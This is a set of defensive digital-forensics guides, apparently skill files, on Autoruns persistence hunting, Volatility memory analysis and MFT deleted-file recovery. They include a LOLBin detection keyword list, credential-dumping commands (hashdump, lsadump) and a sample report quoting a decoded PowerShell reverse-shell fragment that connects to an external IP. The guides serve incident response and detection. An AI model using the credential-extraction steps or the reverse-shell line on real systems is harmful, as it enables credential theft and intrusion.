|
||||
- Python 3.9+ for automated analysis
|
||||
- VirusTotal API key for reputation checks
|
||||
- Clean baseline export for comparison
|
||||
|
||||
## Practical Steps
|
||||
|
||||
### Step 1: Automated Persistence Scanning
|
||||
|
||||
```python
#!/usr/bin/env python3
"""Automate Autoruns-based persistence analysis."""
import csv
import subprocess
import sys

# Lowercased path fragments that commonly host persistence binaries.
# Backslashes are doubled so Python does not read them as escape sequences.
SUSPICIOUS_PATHS = ["\\temp\\", "\\appdata\\local\\temp", "\\users\\public\\"]
LOLBIN_KEYWORDS = ["powershell", "cmd /c", "wscript", "mshta", "regsvr32"]


def scan_and_analyze(autorunsc_path="autorunsc64.exe", csv_path="scan.csv"):
    """Run Autorunsc across all ASEP categories and flag suspicious entries."""
    # -a *: all entry types, -c: CSV output, -h: file hashes,
    # -s: verify signatures, trailing *: scan all user profiles
    cmd = [autorunsc_path, "-a", "*", "-c", "-h", "-s", "-nobanner", "*"]
    result = subprocess.run(cmd, capture_output=True, timeout=600)
    raw = result.stdout
    # Captured Autorunsc output is often UTF-16; detect the BOM and
    # fall back to UTF-8 otherwise.
    encoding = "utf-16" if raw[:2] in (b"\xff\xfe", b"\xfe\xff") else "utf-8"
    with open(csv_path, "w", encoding="utf-8", newline="") as f:
        f.write(raw.decode(encoding, errors="replace"))
    return parse_and_flag(csv_path)


def parse_and_flag(csv_path):
    """Return CSV rows that match at least one persistence heuristic."""
    suspicious = []
    with open(csv_path, "r", encoding="utf-8-sig", errors="replace", newline="") as f:
        for row in csv.DictReader(f):
            reasons = []
            signer = (row.get("Signer") or "").strip()
            # Autoruns prefixes unverifiable signers with "(Not verified)"
            if not signer or signer.startswith("(Not verified)"):
                reasons.append("Unsigned or unverified binary")
            if not row.get("Description") and not row.get("Company"):
                reasons.append("Missing metadata")
            path = (row.get("Image Path") or "").lower()
            if any(sp in path for sp in SUSPICIOUS_PATHS):
                reasons.append("Suspicious path")
            launch = (row.get("Launch String") or "").lower()
            for kw in LOLBIN_KEYWORDS:
                if kw in launch:
                    reasons.append(f"LOLBin: {kw}")
            if reasons:
                row["reasons"] = reasons
                suspicious.append(row)
    return suspicious


if __name__ == "__main__":
    # With a CSV argument, analyze an existing export; otherwise run a live scan
    results = parse_and_flag(sys.argv[1]) if len(sys.argv) > 1 else scan_and_analyze()
    print(f"[!] {len(results)} suspicious entries")
    for r in results:
        print(f"  {r.get('Entry', '')} - {r.get('Image Path', '')}")
        for reason in r.get("reasons", []):
            print(f"    - {reason}")
```
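
The baseline comparison mentioned in the Overview can also be approximated outside the Autoruns GUI. The following is a minimal sketch, assuming two Autorunsc CSV exports that share the `Entry Location`, `Entry`, and `Image Path` columns (`Entry Location` is an assumption about the export header; the function names and sample rows are hypothetical):

```python
import csv
import io


def load_entries(csv_text):
    """Index CSV rows by (location, entry, image path), lowercased."""
    entries = {}
    for row in csv.DictReader(io.StringIO(csv_text)):
        key = tuple(
            (row.get(col) or "").strip().lower()
            for col in ("Entry Location", "Entry", "Image Path")
        )
        entries[key] = row
    return entries


def diff_against_baseline(baseline_csv, current_csv):
    """Return rows present in the current scan but absent from the baseline."""
    baseline = load_entries(baseline_csv)
    current = load_entries(current_csv)
    return [row for key, row in current.items() if key not in baseline]


# Hypothetical sample data standing in for two real exports
baseline_csv = (
    "Entry Location,Entry,Image Path\n"
    "HKLM\\Run,SecurityHealth,c:\\windows\\system32\\securityhealthsystray.exe\n"
)
current_csv = baseline_csv + "HKCU\\Run,Updater,c:\\users\\public\\updater.exe\n"

new_entries = diff_against_baseline(baseline_csv, current_csv)
for row in new_entries:
    print(f"[NEW] {row['Entry Location']} | {row['Entry']} | {row['Image Path']}")
```

Keying on location, entry name, and image path keeps the diff stable across scans; adding the hash columns to the key would also surface binaries replaced in place.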
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- All ASEP categories scanned and cataloged
|
||||
- Unsigned entries flagged for investigation
|
||||
- Suspicious paths and LOLBin launch strings highlighted
|
||||
- Baseline comparison identifies new persistence mechanisms
|
||||
|
||||
## References
|
||||
|
||||
- [Sysinternals Autoruns](https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns)
|
||||
- [SANS - Offline Autoruns Revisited](https://www.sans.org/blog/offline-autoruns-revisited-auditing-malware-persistence/)
|
||||
- [Hunting Malware with Autoruns](https://nasbench.medium.com/hunting-malware-with-windows-sysinternals-autoruns-19cbfe4103c2)
|
||||
- [MITRE ATT&CK T1547 - Boot or Logon Autostart](https://attack.mitre.org/techniques/T1547/)
|
||||
@@ -0,0 +1,25 @@
|
||||
# Analysis Report Template - analyzing-malware-persistence-with-autoruns
|
||||
|
||||
## Sample Information
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| SHA-256 | |
|
||||
| File Type | |
|
||||
| Analysis Date | |
|
||||
| Analyst | |
|
||||
| Classification | TLP:AMBER |
|
||||
|
||||
## Findings
|
||||
| Finding | Severity | Details |
|
||||
|---------|----------|---------|
|
||||
| | | |
|
||||
|
||||
## IOCs Extracted
|
||||
| Type | Value | Context |
|
||||
|------|-------|---------|
|
||||
| | | |
|
||||
|
||||
## Recommendations
|
||||
1.
|
||||
2.
|
||||
3.
|
||||
@@ -0,0 +1,9 @@
|
||||
# Standards Reference - analyzing-malware-persistence-with-autoruns
|
||||
|
||||
## Applicable Standards
|
||||
- MITRE ATT&CK Framework
|
||||
- NIST SP 800-83 Guide to Malware Incident Prevention and Handling for Desktops and Laptops
|
||||
- NIST SP 800-86 Guide to Integrating Forensic Techniques into Incident Response
|
||||
|
||||
## Related MITRE ATT&CK Techniques
|
||||
See SKILL.md for specific technique mappings.
|
||||
@@ -0,0 +1,11 @@
|
||||
# Analysis Workflows - analyzing-malware-persistence-with-autoruns
|
||||
|
||||
## Primary Workflow
|
||||
```
|
||||
[Sample Collection] --> [Static Analysis] --> [Dynamic Analysis] --> [IOC Extraction]
|
||||
|
|
||||
v
|
||||
[Report Generation]
|
||||
```
|
||||
|
||||
See SKILL.md for detailed step-by-step procedures.
|
||||
@@ -0,0 +1,298 @@
|
||||
---
|
||||
name: analyzing-memory-dumps-with-volatility
|
||||
description: >
|
||||
Analyzes RAM memory dumps from compromised systems using the Volatility framework to
|
||||
identify malicious processes, injected code, network connections, loaded modules, and
|
||||
extracted credentials. Supports Windows, Linux, and macOS memory forensics. Activates
|
||||
for requests involving memory forensics, RAM analysis, volatile data examination,
|
||||
process injection detection, or memory-resident malware investigation.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, memory-forensics, Volatility, RAM-analysis, incident-response]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Memory Dumps with Volatility
|
||||
|
||||
## When to Use
|
||||
|
||||
- A compromised system's RAM has been captured and needs forensic analysis for malware artifacts
|
||||
- Detecting fileless malware that exists only in memory without persistent disk artifacts
|
||||
- Extracting encryption keys, passwords, or decrypted configuration from process memory
|
||||
- Identifying process injection, DLL injection, or process hollowing in a compromised system
|
||||
- Analyzing rootkit activity that hides from standard disk-based forensic tools
|
||||
|
||||
**Do not use** for disk image analysis; use Autopsy, FTK, or Sleuth Kit for disk forensics.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Volatility 3 installed (`pip install volatility3`) with symbol tables for target OS
|
||||
- Memory dump file acquired from the target system (using WinPmem, LiME, or DumpIt)
|
||||
- Knowledge of the source OS version for correct profile/symbol selection
|
||||
- Sufficient disk space (memory dumps can be 4-64 GB)
|
||||
- YARA rules for scanning memory for known malware signatures
|
||||
- Strings utility for extracting readable strings from memory regions
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify the Memory Dump Profile
|
||||
|
||||
Determine the operating system and version from the memory dump:
|
||||
|
||||
```bash
|
||||
# Volatility 3: Automatic OS detection
|
||||
vol3 -f memory.dmp windows.info
|
||||
|
||||
# List available plugins
|
||||
vol3 -f memory.dmp --help
|
||||
|
||||
# If symbols are needed, download from:
|
||||
# https://downloads.volatilityfoundation.org/volatility3/symbols/
|
||||
|
||||
# For Volatility 2 (legacy):
|
||||
vol2 -f memory.dmp imageinfo
|
||||
vol2 -f memory.dmp kdbgscan
|
||||
```
|
||||
|
||||
### Step 2: Enumerate Running Processes
|
||||
|
||||
List all processes and identify suspicious entries:
|
||||
|
||||
```bash
|
||||
# List all processes
|
||||
vol3 -f memory.dmp windows.pslist
|
||||
|
||||
# Process tree (parent-child relationships)
|
||||
vol3 -f memory.dmp windows.pstree
|
||||
|
||||
# Scan for hidden/unlinked processes (rootkit detection)
|
||||
vol3 -f memory.dmp windows.psscan
|
||||
|
||||
# Compare pslist vs psscan to find hidden processes
|
||||
# Processes in psscan but not pslist are potentially hidden by rootkits
|
||||
|
||||
# Check for process hollowing
|
||||
vol3 -f memory.dmp windows.pslist --dump
|
||||
# Then verify the dumped EXE matches the expected binary on disk
|
||||
```
|
||||
|
||||
```
|
||||
Suspicious Process Indicators:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
- svchost.exe not spawned by services.exe (wrong parent)
|
||||
- csrss.exe/lsass.exe with unusual parent process
|
||||
- Multiple instances of lsass.exe (should be only one)
|
||||
- Processes with misspelled names (scvhost.exe, lssas.exe)
|
||||
- cmd.exe or powershell.exe spawned by WINWORD.EXE or browser
|
||||
- Processes running from unusual paths (%TEMP%, %APPDATA%)
|
||||
- Processes with no parent (orphaned - parent terminated)
|
||||
```
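
The pslist versus psscan comparison described in this step can be scripted once both outputs are exported as CSV. This is a rough sketch, assuming each export has `PID` and `ImageFileName` columns (an assumption about the CSV header; the function names and sample rows are hypothetical):

```python
import csv
import io


def pids_from_csv(csv_text):
    """Map PID -> process name from a Volatility CSV export."""
    rows = csv.DictReader(io.StringIO(csv_text))
    return {int(r["PID"]): r.get("ImageFileName", "") for r in rows if r.get("PID")}


def hidden_candidates(pslist_csv, psscan_csv):
    """Return processes found by pool scanning but missing from the linked list."""
    listed = pids_from_csv(pslist_csv)
    scanned = pids_from_csv(psscan_csv)
    return {pid: name for pid, name in scanned.items() if pid not in listed}


# Hypothetical sample exports
pslist_csv = "PID,PPID,ImageFileName\n4,0,System\n852,700,explorer.exe\n"
psscan_csv = pslist_csv + "2184,1052,svchost.exe\n"

hidden = hidden_candidates(pslist_csv, psscan_csv)
for pid, name in sorted(hidden.items()):
    print(f"[?] PID {pid} ({name}) appears only in psscan")
```

A PID that appears only in psscan is a lead, not proof of a rootkit: terminated processes whose structures have not yet been overwritten show up the same way, so check the exit time before drawing conclusions.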
|
||||
|
||||
### Step 3: Detect Malicious Code Injection
|
||||
|
||||
Scan for injected code and process hollowing:
|
||||
|
||||
```bash
|
||||
# Detect injected code in processes (malfind)
|
||||
vol3 -f memory.dmp windows.malfind
|
||||
|
||||
# Malfind looks for:
|
||||
# - Memory regions with PAGE_EXECUTE_READWRITE protection
|
||||
# - Memory regions containing PE headers (MZ/PE signature)
|
||||
# - VAD (Virtual Address Descriptor) anomalies
|
||||
|
||||
# Dump injected memory regions for analysis
|
||||
vol3 -f memory.dmp windows.malfind --dump --pid 2184
|
||||
|
||||
# List loaded DLLs per process
|
||||
vol3 -f memory.dmp windows.dlllist --pid 2184
|
||||
|
||||
# Detect hollowed processes by comparing VAD and PEB image information
# (windows.hollowprocesses ships with recent Volatility 3 releases)
vol3 -f memory.dmp windows.hollowprocesses
|
||||
|
||||
# Scan for loaded drivers (potential rootkit drivers)
|
||||
vol3 -f memory.dmp windows.driverscan
|
||||
|
||||
# List kernel modules
|
||||
vol3 -f memory.dmp windows.modules
|
||||
```
|
||||
|
||||
### Step 4: Analyze Network Connections
|
||||
|
||||
Extract active and closed network connections:
|
||||
|
||||
```bash
|
||||
# List all network connections (active and listening)
|
||||
vol3 -f memory.dmp windows.netscan
|
||||
|
||||
# Output columns: Offset, Protocol, LocalAddr, LocalPort, ForeignAddr, ForeignPort, State, PID, Owner
|
||||
|
||||
# Filter for established connections to external IPs
|
||||
vol3 -f memory.dmp windows.netscan | grep ESTABLISHED
|
||||
|
||||
# Alternative: windows.netstat walks the kernel's connection tracking structures instead of pool scanning
|
||||
vol3 -f memory.dmp windows.netstat
|
||||
|
||||
# Cross-reference PIDs with process list
|
||||
# Suspicious: svchost.exe connected to external IP on non-standard port
|
||||
# Suspicious: notepad.exe or calc.exe with network connections
|
||||
```
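
Filtering for established connections to external addresses is easier to repeat in a script than with `grep`. The sketch below assumes a CSV export of `windows.netscan` with the `ForeignAddr`, `State`, `PID`, and `Owner` columns listed above; the function name and sample rows are hypothetical:

```python
import csv
import io
import ipaddress


def external_established(netscan_csv):
    """Return ESTABLISHED rows whose foreign address is publicly routable."""
    hits = []
    for row in csv.DictReader(io.StringIO(netscan_csv)):
        if row.get("State") != "ESTABLISHED":
            continue
        try:
            addr = ipaddress.ip_address(row.get("ForeignAddr", ""))
        except ValueError:
            continue  # skip wildcard or malformed addresses
        if addr.is_global:
            hits.append(row)
    return hits


# Hypothetical sample export
netscan_csv = (
    "Offset,Protocol,LocalAddr,LocalPort,ForeignAddr,ForeignPort,State,PID,Owner\n"
    "0x1,TCPv4,10.1.5.42,49152,185.220.101.42,443,ESTABLISHED,2184,svchost.exe\n"
    "0x2,TCPv4,10.1.5.42,49300,10.1.5.10,445,ESTABLISHED,4,System\n"
    "0x3,TCPv4,0.0.0.0,135,0.0.0.0,0,LISTENING,900,svchost.exe\n"
)

external = external_established(netscan_csv)
for row in external:
    print(f"{row['Owner']} (PID {row['PID']}) -> {row['ForeignAddr']}:{row['ForeignPort']}")
```

The resulting PIDs can then be cross-referenced with the process list, as the comments in the block above suggest.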
|
||||
|
||||
### Step 5: Extract Artifacts and Credentials
|
||||
|
||||
Recover sensitive data from memory:
|
||||
|
||||
```bash
|
||||
# Dump process memory for a specific PID
|
||||
vol3 -f memory.dmp windows.memmap --dump --pid 2184
|
||||
|
||||
# Show the command-line arguments each process was started with
|
||||
vol3 -f memory.dmp windows.cmdline
|
||||
|
||||
# Extract environment variables
|
||||
vol3 -f memory.dmp windows.envars --pid 2184
|
||||
|
||||
# Registry analysis (extract Run keys for persistence)
|
||||
vol3 -f memory.dmp windows.registry.printkey \
|
||||
--key "Software\Microsoft\Windows\CurrentVersion\Run"
|
||||
|
||||
# Extract hashed/cached credentials
|
||||
vol3 -f memory.dmp windows.hashdump
|
||||
vol3 -f memory.dmp windows.cachedump
|
||||
vol3 -f memory.dmp windows.lsadump
|
||||
|
||||
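# Extract clipboard contents (a Volatility 2 plugin; core Volatility 3 does not appear to ship an equivalent)
vol2 -f memory.dmp --profile=PROFILE clipboard   # PROFILE as suggested by imageinfo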
|
||||
|
||||
# File extraction from memory
|
||||
vol3 -f memory.dmp windows.filescan | grep -i "payload\|malware\|suspicious"
|
||||
vol3 -f memory.dmp windows.dumpfiles --virtaddr 0xFA8001234560
|
||||
```
|
||||
|
||||
### Step 6: Scan Memory with YARA Rules
|
||||
|
||||
Apply YARA signatures to detect known malware in memory:
|
||||
|
||||
```bash
|
||||
# Scan entire memory dump with YARA rules
|
||||
vol3 -f memory.dmp yarascan.YaraScan --yara-file malware_rules.yar
|
||||
|
||||
# Scan specific process memory
|
||||
vol3 -f memory.dmp windows.vadyarascan.VadYaraScan --yara-file malware_rules.yar --pid 2184
|
||||
|
||||
# Built-in YARA scan for common patterns
|
||||
vol3 -f memory.dmp yarascan.YaraScan --yara-rules "rule FindC2 { strings: \$s1 = \"gate.php\" condition: \$s1 }"
|
||||
|
||||
# Scan for AES S-box constants (locates AES implementations or lookup tables, not the keys themselves)
|
||||
vol3 -f memory.dmp yarascan.YaraScan --yara-rules "rule AES_Key { strings: \$sbox = { 63 7C 77 7B F2 6B 6F C5 } condition: \$sbox }"
|
||||
```
|
||||
|
||||
### Step 7: Timeline and Report Generation
|
||||
|
||||
Create an analysis timeline and compile findings:
|
||||
|
||||
```bash
|
||||
# Generate comprehensive timeline
|
||||
vol3 -r csv -f memory.dmp timeliner.Timeliner > timeline.csv
|
||||
|
||||
# Timeline includes:
|
||||
# - Process creation/exit times
|
||||
# - Network connection timestamps
|
||||
# - Registry modification times
|
||||
# - File access times
|
||||
|
||||
# Export process list for reporting
|
||||
vol3 -r csv -f memory.dmp windows.pslist > processes.csv
|
||||
|
||||
# Export network connections
|
||||
vol3 -r csv -f memory.dmp windows.netscan > network.csv
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **Memory Forensics** | Analysis of volatile memory (RAM) contents to identify running processes, network connections, and in-memory artifacts that may not exist on disk |
|
||||
| **Process Hollowing** | Malware technique of creating a legitimate process in suspended state, replacing its memory with malicious code, then resuming execution |
|
||||
| **Malfind** | Volatility plugin detecting injected code by identifying memory regions with executable permissions and PE headers in non-image VADs |
|
||||
| **VAD (Virtual Address Descriptor)** | Windows kernel structure tracking memory regions allocated to a process; anomalies in VADs indicate injection or hollowing |
|
||||
| **EPROCESS** | Windows kernel structure representing a process; rootkits unlink EPROCESS entries to hide processes from standard tools |
|
||||
| **Pool Tag Scanning** | Memory forensics technique scanning for kernel object pool tags to find objects (processes, files, connections) even when unlinked |
|
||||
| **Fileless Malware** | Malware that operates primarily in memory without writing executable files to disk; often detectable only through memory forensics, although traces may remain in the registry, WMI, or event logs |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Volatility 3**: Open-source memory forensics framework supporting Windows, Linux, and macOS memory analysis with plugin architecture
|
||||
- **WinPmem**: Memory acquisition tool for Windows systems that creates raw memory dumps for offline analysis
|
||||
- **LiME (Linux Memory Extractor)**: Loadable kernel module for capturing Linux system memory dumps
|
||||
- **Rekall**: Alternative memory forensics framework with some unique analysis capabilities (discontinued but still useful)
|
||||
- **MemProcFS**: Memory process file system allowing mounting memory dumps as file systems for intuitive analysis
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Detecting Fileless Malware After EDR Alert
|
||||
|
||||
**Context**: EDR detected suspicious PowerShell activity but the threat actor cleaned up disk artifacts. A memory dump was captured before the system was rebooted. The analysis needs to identify the malware, its persistence mechanism, and any lateral movement.
|
||||
|
||||
**Approach**:
|
||||
1. Run `windows.pstree` to identify the process chain (which process spawned PowerShell)
|
||||
2. Run `windows.malfind` to detect injected code in running processes
|
||||
3. Dump the suspicious process memory and extract strings for C2 URLs
|
||||
4. Run `windows.netscan` to identify network connections from the compromised processes
|
||||
5. Run `windows.cmdline` to see what commands PowerShell executed
|
||||
6. Scan with YARA rules for known malware families in the dumped process memory
|
||||
7. Extract credentials with `hashdump` and `lsadump` to assess lateral movement risk
|
||||
|
||||
**Pitfalls**:
|
||||
- Using the wrong symbol tables for the OS version (causes plugin failures or incorrect results)
|
||||
- Not comparing `pslist` vs `psscan` output (missing rootkit-hidden processes)
|
||||
- Ignoring legitimate processes that have been injected into (focus on malfind results, not just process names)
|
||||
- Not extracting full process memory before concluding analysis (strings from process dump may reveal additional IOCs)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
MEMORY FORENSICS ANALYSIS REPORT
|
||||
===================================
|
||||
Dump File: memory.dmp
|
||||
Dump Size: 16 GB
|
||||
OS Version: Windows 10 21H2 (Build 19044)
|
||||
Capture Tool: WinPmem 4.0
|
||||
Capture Time: 2025-09-15 14:35:00 UTC
|
||||
|
||||
SUSPICIOUS PROCESSES
|
||||
PID PPID Name Path Anomaly
|
||||
2184 1052 svchost.exe C:\Users\Admin\AppData\Temp\svchost.exe Wrong path
|
||||
4012 2184 powershell.exe C:\Windows\System32\powershell.exe Child of fake svchost
|
||||
3456 4012 cmd.exe C:\Windows\System32\cmd.exe Spawned by PowerShell
|
||||
|
||||
CODE INJECTION DETECTED (malfind)
|
||||
PID 852 (explorer.exe):
|
||||
Address: 0x00400000 Size: 98304 Protection: PAGE_EXECUTE_READWRITE
|
||||
Header: MZ (embedded PE detected)
|
||||
SHA-256 of dump: abc123def456...
|
||||
|
||||
NETWORK CONNECTIONS
|
||||
PID Process Local Foreign State
|
||||
2184 svchost.exe 10.1.5.42:49152 185.220.101.42:443 ESTABLISHED
|
||||
4012 powershell.exe 10.1.5.42:49200 91.215.85.17:8080 ESTABLISHED
|
||||
|
||||
EXTRACTED CREDENTIALS
|
||||
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
|
||||
|
||||
COMMAND LINE HISTORY
|
||||
PID 4012: powershell.exe -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AA... (truncated)
|
||||
Decoded: $client = New-Object System.Net.Sockets.TCPClient("185.220.101.42",443)
|
||||
|
||||
YARA MATCHES
|
||||
PID 2184: rule CobaltStrike_Beacon { matched at 0x00401200 }
|
||||
|
||||
TIMELINE
|
||||
14:10:00 svchost.exe (PID 2184) created from C:\Users\Admin\AppData\Temp\
|
||||
14:10:05 Network connection to 185.220.101.42:443 established
|
||||
14:12:30 powershell.exe (PID 4012) spawned by svchost.exe
|
||||
14:15:00 Code injection into explorer.exe (PID 852) detected
|
||||
14:20:00 Credential dump from LSASS process
|
||||
```
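
The `-enc` argument in the COMMAND LINE HISTORY section of the sample report is Base64 over UTF-16LE text, so it can be decoded offline during report writing. A small sketch follows; the function name is hypothetical, and the string is the Base64 text shown in the sample report, which covers only the first part of the decoded command:

```python
import base64


def decode_powershell_enc(encoded):
    """Decode a PowerShell -EncodedCommand argument (Base64 over UTF-16LE)."""
    return base64.b64decode(encoded).decode("utf-16-le")


encoded = "JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0AA=="
decoded = decode_powershell_enc(encoded)
print(decoded)  # prints: $client = New-Object
```

Decoding as UTF-8 instead would leave a NUL byte after every character, which is a quick way to recognize this encoding in raw strings output.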
|
||||
@@ -0,0 +1,188 @@
|
||||
---
|
||||
name: analyzing-mft-for-deleted-file-recovery
|
||||
description: Analyze the NTFS Master File Table ($MFT) to recover metadata and content of deleted files by examining MFT record entries, $LogFile, $UsnJrnl, and MFT slack space using MFTECmd, analyzeMFT, and X-Ways Forensics.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [mft, ntfs, deleted-files, file-recovery, mftecmd, usn-journal, logfile, mft-slack-space, file-system-forensics, dfir]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing MFT for Deleted File Recovery
|
||||
|
||||
## Overview
|
||||
|
||||
The NTFS Master File Table ($MFT) is the central metadata repository for every file and directory on an NTFS volume. Each file is represented by at least one 1024-byte MFT record containing attributes such as $STANDARD_INFORMATION (timestamps, permissions), $FILE_NAME (name, parent directory, timestamps), and $DATA (file content or cluster run pointers). When a file is deleted, its MFT record is marked as inactive (InUse flag cleared) but the metadata remains until the entry is reallocated by a new file. This persistence makes MFT analysis a primary technique for recovering deleted file evidence, reconstructing file system timelines, and detecting anti-forensic activity such as timestomping.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Forensic disk image (E01, raw/dd, VMDK, or VHDX format)
|
||||
- MFTECmd (Eric Zimmerman) or analyzeMFT (Python-based)
|
||||
- FTK Imager, Arsenal Image Mounter, or similar for image mounting
|
||||
- Timeline Explorer or Excel for CSV analysis
|
||||
- Python 3.8+ for custom analysis scripts
|
||||
- Understanding of NTFS file system internals
|
||||
|
||||
## MFT Structure and Record Layout
|
||||
|
||||
### MFT Record Header
|
||||
|
||||
Each MFT record begins with the signature "FILE" (0x46494C45) and contains:
|
||||
|
||||
| Offset | Size | Field |
|
||||
|--------|------|-------|
|
||||
| 0x00 | 4 bytes | Signature ("FILE") |
|
||||
| 0x04 | 2 bytes | Offset to update sequence |
|
||||
| 0x06 | 2 bytes | Size of update sequence |
|
||||
| 0x08 | 8 bytes | $LogFile sequence number |
|
||||
| 0x10 | 2 bytes | Sequence number |
|
||||
| 0x12 | 2 bytes | Hard link count |
|
||||
| 0x14 | 2 bytes | Offset to first attribute |
|
||||
| 0x16 | 2 bytes | Flags (0x01 = InUse, 0x02 = Directory) |
|
||||
| 0x18 | 4 bytes | Used size of MFT record |
|
||||
| 0x1C | 4 bytes | Allocated size of MFT record |
|
||||
| 0x20 | 8 bytes | Base file record reference |
|
||||
| 0x28 | 2 bytes | Next attribute ID |
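
The header layout in the table above maps directly onto a fixed-size little-endian structure. The following is a minimal sketch of decoding it with Python's `struct` module; the field names, `parse_mft_header`, and the synthetic record are illustrative assumptions, not part of any tool's API:

```python
import struct
from collections import namedtuple

# Little-endian layout of offsets 0x00-0x29 from the table above
MFT_HEADER = struct.Struct("<4sHHQHHHHIIQH")
MftHeader = namedtuple(
    "MftHeader",
    "signature usa_offset usa_size lsn sequence hard_links "
    "first_attr_offset flags used_size allocated_size base_record next_attr_id",
)


def parse_mft_header(record: bytes) -> MftHeader:
    """Decode the fixed header at the start of a raw MFT record."""
    if len(record) < MFT_HEADER.size:
        raise ValueError("record shorter than MFT header")
    return MftHeader(*MFT_HEADER.unpack_from(record, 0))


# Synthetic 1024-byte record with flags 0x00 (a deleted file)
raw = MFT_HEADER.pack(b"FILE", 0x30, 3, 0, 5, 0, 0x38, 0x00, 0x1A0, 0x400, 0, 4)
raw = raw.ljust(1024, b"\x00")

hdr = parse_mft_header(raw)
in_use = bool(hdr.flags & 0x01)
is_directory = bool(hdr.flags & 0x02)
print(hdr.signature, hdr.used_size, hdr.allocated_size, in_use, is_directory)
```

A record whose signature is `FILE` but whose `flags` field has bit 0x01 cleared is the on-disk form of the "deleted" state that the recovery techniques below rely on.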
|
||||
|
||||
### Key MFT Attributes
|
||||
|
||||
| Type ID | Name | Description |
|
||||
|---------|------|-------------|
|
||||
| 0x10 | $STANDARD_INFORMATION | Timestamps, flags, owner ID, security ID |
|
||||
| 0x30 | $FILE_NAME | Filename, parent MFT reference, timestamps |
|
||||
| 0x40 | $OBJECT_ID | Unique GUID for the file |
|
||||
| 0x50 | $SECURITY_DESCRIPTOR | ACL permissions |
|
||||
| 0x60 | $VOLUME_NAME | Volume label (volume metadata files only) |
|
||||
| 0x80 | $DATA | File content (resident if <700 bytes) or cluster run list |
|
||||
| 0x90 | $INDEX_ROOT | B-tree index root for directories |
|
||||
| 0xA0 | $INDEX_ALLOCATION | B-tree index entries for large directories |
|
||||
| 0xB0 | $BITMAP | Allocation bitmap for index or MFT |
|
||||
|
||||
## Deleted File Recovery Techniques
|
||||
|
||||
### Technique 1: MFT Record Analysis with MFTECmd
|
||||
|
||||
```powershell
|
||||
# Extract $MFT from forensic image using KAPE or FTK Imager
|
||||
# Parse the $MFT with MFTECmd
|
||||
# Single quotes stop PowerShell from expanding $MFT as a variable
MFTECmd.exe -f 'C:\Evidence\$MFT' --csv C:\Output --csvf mft_full.csv
|
||||
|
||||
# Filter for deleted files (InUse = FALSE) in Timeline Explorer
|
||||
# Look for entries where InUse column is False
|
||||
```
|
||||
|
||||
**Identifying Deleted Files in CSV Output:**
|
||||
- `InUse` = False indicates a deleted record whose MFT entry has not yet been reused by a new file
|
||||
- `ParentPath` shows original file location before deletion
|
||||
- `FileSize` shows the original size (may still be recoverable)
|
||||
- Timestamps in `$STANDARD_INFORMATION` and `$FILE_NAME` attributes persist
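
For large volumes, filtering the CSV in a script is often quicker than scrolling in Timeline Explorer. The sketch below assumes the MFTECmd CSV exposes `InUse`, `ParentPath`, and `FileSize` as described above, plus `EntryNumber` and `FileName` columns (those two names are assumptions, as are the function name and sample rows):

```python
import csv
import io


def deleted_entries(mft_csv_text):
    """Return rows whose InUse column is False (deleted, not yet reused)."""
    deleted = []
    for row in csv.DictReader(io.StringIO(mft_csv_text)):
        if (row.get("InUse") or "").strip().lower() == "false":
            deleted.append(row)
    return deleted


# Hypothetical sample of MFTECmd output
mft_csv = (
    "EntryNumber,InUse,ParentPath,FileName,FileSize\n"
    "41,True,.\\Users\\Admin\\Documents,report.docx,20480\n"
    "42,False,.\\Users\\Admin\\Downloads,payload.exe,98304\n"
)

deleted = deleted_entries(mft_csv)
for row in deleted:
    print(f"{row['EntryNumber']}: {row['ParentPath']}\\{row['FileName']} ({row['FileSize']} bytes)")
```

For a real export, read the file with `open(path, newline="", encoding="utf-8-sig")` and pass the rows to the same filter.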
|
||||
|
||||
### Technique 2: USN Journal ($UsnJrnl:$J) Analysis
|
||||
|
||||
The USN Journal records all changes to files on an NTFS volume, including creation, deletion, rename, and data modification events.
|
||||
|
||||
```powershell
|
||||
# Parse USN Journal with MFTECmd
|
||||
MFTECmd.exe -f 'C:\Evidence\$J' --csv C:\Output --csvf usn_journal.csv
|
||||
|
||||
# Key USN reason codes for deletion evidence:
|
||||
# USN_REASON_FILE_DELETE = 0x00000200
|
||||
# USN_REASON_CLOSE = 0x80000000
|
||||
# USN_REASON_RENAME_OLD_NAME = 0x00001000
|
||||
# USN_REASON_RENAME_NEW_NAME = 0x00002000
|
||||
```
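
USN reason values are bitmasks, so a single journal record often combines several of the codes listed above (for example a delete followed by a close). A small sketch of decoding a raw mask, limited to the four codes from this section; the function name is hypothetical:

```python
# Reason codes taken from the list above
USN_REASONS = {
    0x00000200: "FILE_DELETE",
    0x00001000: "RENAME_OLD_NAME",
    0x00002000: "RENAME_NEW_NAME",
    0x80000000: "CLOSE",
}


def decode_usn_reason(mask):
    """Split a USN reason bitmask into known names plus any leftover bits."""
    names = []
    remaining = mask
    for bit, name in sorted(USN_REASONS.items()):
        if mask & bit:
            names.append(name)
            remaining &= ~bit
    if remaining:
        # Bits not covered by the table are reported as hex for manual lookup
        names.append(f"0x{remaining:08X}")
    return names


print(decode_usn_reason(0x80000200))  # prints: ['FILE_DELETE', 'CLOSE']
```

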